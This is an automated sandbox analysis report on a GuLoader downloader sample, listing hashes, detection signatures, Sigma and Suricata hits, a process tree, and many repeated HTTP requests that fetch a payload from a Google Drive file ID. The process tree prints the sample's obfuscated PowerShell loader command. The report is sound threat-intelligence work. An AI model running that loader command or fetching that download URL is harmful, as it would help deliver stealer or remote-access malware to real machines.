Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ro7eoySJ9q.exe

Overview

General Information

Sample name:ro7eoySJ9q.exe
renamed because original name is a hash value
Original sample name:ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423.exe
Analysis ID:1588610
MD5:69c59075bc9ffd11bf75080cfe44f29e
SHA1:e1cb7f85eb9236fad345bc1e3f941219cdf84edc
SHA256:ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ro7eoySJ9q.exe (PID: 5616 cmdline: "C:\Users\user\Desktop\ro7eoySJ9q.exe" MD5: 69C59075BC9FFD11BF75080CFE44F29E)
    • powershell.exe (PID: 5732 cmdline: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6968 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3928284936.000000000461B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.2707883561.000000000985B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Msiexec Initiated Connection
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6968, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49975
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5732, TargetFilename: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" , CommandLine: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ro7eoySJ9q.exe", ParentImage: C:\Users\user\Desktop\ro7eoySJ9q.exe, ParentProcessId: 5616, ParentProcessName: ro7eoySJ9q.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" , ProcessId: 5732, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T03:16:24.547206+010028032702Potentially Bad Traffic192.168.2.549975142.250.185.110443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exeReversingLabs: Detection: 60%
      Multi AV Scanner detection for submitted file
      Source: ro7eoySJ9q.exeReversingLabs: Detection: 60%
      Source: ro7eoySJ9q.exeVirustotal: Detection: 72%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.1% probability
      Source: ro7eoySJ9q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.5:49975 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.5:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.5:49980 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.5:49984 version: TLS 1.2
      Source: Binary string: re.pdbro source: powershell.exe, 00000002.00000002.2706703268.0000000007ED2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2706703268.0000000007ED2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2696055042.0000000006BFD000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49975 -> 142.250.185.110:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
